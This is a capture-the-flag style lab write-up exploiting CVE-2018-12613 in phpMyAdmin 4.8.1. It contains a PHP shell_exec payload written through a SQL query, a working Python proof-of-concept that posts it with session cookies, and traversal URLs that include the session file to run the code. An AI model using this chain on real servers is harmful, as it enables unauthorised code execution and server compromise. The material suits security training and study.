Post

AttackDefense.com [LFI] - CVE-2018-12613 Exploit

Image of AttackDefense 2018

Mission

An attacker might get administrative access to a web application. However, this does not automatically mean that the web server can be compromised. In cases where a SaaS application is made available to users, it is routine to give each user admin access to his own instance of the web application e.g. a managed hosted Wordpress site. In such scenario, the attacker who will begin accessing the application as a managed administrative user will have to figure out how to exploit the administrative interface to get a shell on the server. In some cases, it might be possible to do privilege escalation as well.

In the exercise below, the attacker has administrative access to the web application and needs to find a local file inclusion attack to get important files from the server.

PHPMyAdmin is a free and open source web based administration tool for MySQL and MariaDB. It is developed in PHP and Javascript.

PHPMyAdmin (4.8.1) is vulnerable to a Local File Inclusion documented in CVE-2018-12613.

The following username and passwords may be used to explore the application and/or find a vulnerability which might require authenticated access:

  • Username: pentester
  • Password: password1

Objective: Your task is to find and exploit this vulnerability.

Level difficulty: Intermediate

Category: Webapps CVEs > Local File Inclusion

Solution

At first, I was provided with the PHPMyAdmin web application with a functional user account and password. PHPMyAdmin is a free and open source administration tool for MySQL and MariaDB. As a portable web application written primarily in PHP, it has become one of the most popular MySQL administration tools, especially for web hosting services. Using the provided credentials, I authenticated in the administrative panel of the application.

Image of AttackDefense 2018

Image of AttackDefense 2018

After performing an research of the application version, I discovered the following public exploit description:

Image of AttackDefense 2018

One of the main functionality of PHPMyAdmin (4.8.1) is to execute SQL Queries. We can use the following form:

Image of AttackDefense 2018

According to the exploit description, we can both create cache files of all commands executed within a session and also include those files in order to execute malicious code. Here is my example of the payload:

1
select '<?php $output = shell_exec("ls -al; date; id;");echo "<pre>$output</pre>";exit;?>'

Image of AttackDefense 2018

We can include the cache file in order to execute our malicious code as such:

Image of AttackDefense 2018

All good, the challenge is complete! I decided to create this PoC as there was no one publicly available exploit at the moment of this article. Here is my Python exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import requests

VALID_PHPMYADMIN_URL = "http://byk4piiac0ltnaqgssdnhrjdr.public1.attackdefenselabs.com:80"

VALID_PHPMYADMIN_SESSION = "5s02743ikru46a31086rrjr8jras81jq"

burp0_url = VALID_PHPMYADMIN_URL + "/import.php"
burp0_cookies = {"phpMyAdmin": VALID_PHPMYADMIN_SESSION, "pma_lang": "en", "pmaUser-1": "%7B%22iv%22%3A%22N2lLHGoe2cuUN5uvAbz8ww%3D%3D%22%2C%22mac%22%3A%222b02670d8802823d99c3ccaf1f0ece9f2eb4c536%22%2C%22payload%22%3A%22mR69lSBATnU%2B%2Bs5jL0c3yw%3D%3D%22%7D", "pmaAuth-1": "%7B%22iv%22%3A%22xoIEoAgAvAxL%5C%2F%5C%2Fa3c0iX8Q%3D%3D%22%2C%22mac%22%3A%22243d87482efacdde27e3d2a6c6e85ae3b903af66%22%2C%22payload%22%3A%22yl27EG%5C%2FIUngUnyZIKNa8O45enMc8iZyHjFpLmiDkWSs%3D%22%7D"}
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}
burp0_data={"is_js_confirmed": "0", "token": "?[I568P@ei7B?OUd", "pos": "0", "goto": "server_sql.php", "message_to_show": "Your SQL query has been executed successfully.", "prev_sql_query": '', "sql_query": "select '<?php $output = shell_exec(\"ls -al; date; id;\");echo \"<pre>$output</pre>\";exit;?>'", "sql_delimiter": ";", "show_query": "1", "fk_checks": "0", "fk_checks": "1", "SQL": "Go", "ajax_request": "true", "ajax_page_request": "true", "_nocache": "1543255823534938840", "token": "?[I568P@ei7B?OUd"}
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print "While autentificated:"

print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_" + VALID_PHPMYADMIN_SESSION

print "- Please check: " + VALID_PHPMYADMIN_URL + "/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php5/sess_" + VALID_PHPMYADMIN_SESSION

Image of AttackDefense 2018

Image of AttackDefense 2018

Image of AttackDefense 2018

This post is licensed under CC BY 4.0 by the author.